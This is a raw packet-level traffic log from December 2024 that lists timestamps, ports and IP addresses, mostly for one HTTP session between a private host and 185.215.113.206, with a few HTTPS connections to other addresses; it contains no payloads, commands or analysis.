Dec 7, 2024 10:51:48.628534079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.628633976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.628866911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.628952980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.629002094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.629777908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.629834890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.629908085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.629952908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.630767107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.630820990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.630918980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.630965948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.631658077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.631707907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.631767035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.631808996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.632641077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.632694960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.632783890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.632833004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.633579969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.633635998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.633728981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.633780956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.634558916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.634613037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.634656906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.634699106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.635482073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.635533094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.635575056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.635621071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.636348963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.636400938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.636437893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.636481047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.637309074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.637408972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.637470007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.638289928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.638334990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.638340950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.638375044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.639179945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.639230013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.639270067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.639338970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.640124083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.640172005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.640207052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.640245914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.641060114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.641107082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.641155005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.641196966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.641998053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.642046928 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.642103910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.642148972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.642946005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.642997026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.643038988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.643079996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.643862009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.643908978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.643990993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.644037008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.644808054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.644859076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.644898891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.644944906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.645740032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.645788908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.645838976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.645881891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.646732092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.646779060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.646836996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.646878004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.647644997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.647667885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.647697926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.647717953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.648555040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.648614883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.648658037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.648694992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.649503946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.649568081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.649600029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.649636030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.650510073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.650531054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.650588989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.651396036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.651460886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.651496887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.651539087 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.652306080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.652421951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.652497053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.653275967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.653335094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.653367996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.653409004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.654191017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.654252052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.654315948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.655154943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.655194998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.655206919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.655231953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.656090975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.656145096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.656179905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.656223059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.657105923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.657129049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.657157898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.657176018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.657954931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.658013105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.658040047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.658082962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.658852100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.658905029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.658979893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.659025908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.659852028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.659913063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.659938097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.659979105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.663177967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663240910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.663254023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663265944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663290977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.663321972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.663572073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663590908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663609028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663624048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.663655043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.663773060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663788080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.663837910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.665091038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.665142059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.665313005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.665360928 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.666744947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.666778088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.666801929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.666840076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.667190075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.667237997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.667306900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.667491913 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.667793036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.667848110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.667860985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.667900085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.668369055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.668417931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.668462038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.668642998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.669234991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.669286013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.669332981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.669415951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.670140028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.670192003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.670241117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.670363903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.671103001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.671156883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.671191931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.671233892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.672030926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.672080994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.672141075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.672193050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.672981024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.673031092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.673099041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.673151016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.673913002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.673969984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.674002886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.674182892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.734857082 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:48.734919071 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:48.735090971 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:48.735137939 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:48.735193014 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:48.737668991 CET	49828	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:48.737725973 CET	443	49828	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:48.737812042 CET	49828	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:48.738073111 CET	49828	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:48.738090038 CET	443	49828	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:48.757590055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.757647991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.757661104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.757699013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.758042097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.758104086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.758202076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.758246899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.759005070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.759129047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.759183884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.759987116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.760032892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.820319891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.820365906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.820413113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.820466042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.820570946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.820621967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.820683002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.820719957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.821513891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.821569920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.821616888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.821659088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.822452068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.822472095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.822504044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.822521925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.823379993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.823422909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.823543072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.823596001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.824331045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.824387074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.824455976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.824493885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.825259924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.825305939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.825381994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.825423956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.826200008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.826236963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.826307058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.826339006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.827172041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.827227116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.827255011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.827300072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.828080893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.828139067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.828171968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.828206062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.829026937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.829078913 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.829152107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.829233885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.829978943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.830029964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.830101013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.830135107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.830914974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.830967903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.831037045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.831073999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.831837893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.831896067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.831944942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.832046032 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.832855940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.832904100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.832961082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.833020926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.833714008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.833760023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.833831072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.833873987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.834678888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.834722996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.834840059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.834914923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.835592985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.835650921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.835665941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.835702896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.836568117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.836683989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.836699963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.836713076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.837565899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.837642908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.837680101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.838408947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.838462114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.838521004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.838552952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.839363098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.839416981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.839451075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.839494944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.840310097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.840361118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.840436935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.840487957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.841259956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.841315985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.841362953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.841401100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.842200994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.842240095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.842252016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.842283964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.843138933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.843189955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.843241930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.843327999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.844047070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.844098091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.844146967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.844295025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.844999075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.845032930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.845052004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.845078945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.845921993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.845971107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.846029043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.846065044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.846848965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.846893072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.846960068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.847105026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.847839117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.847879887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.847912073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.847954035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.848776102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.848839998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.848895073 CET	80	49808	185.215.113.206	192.168.2.6
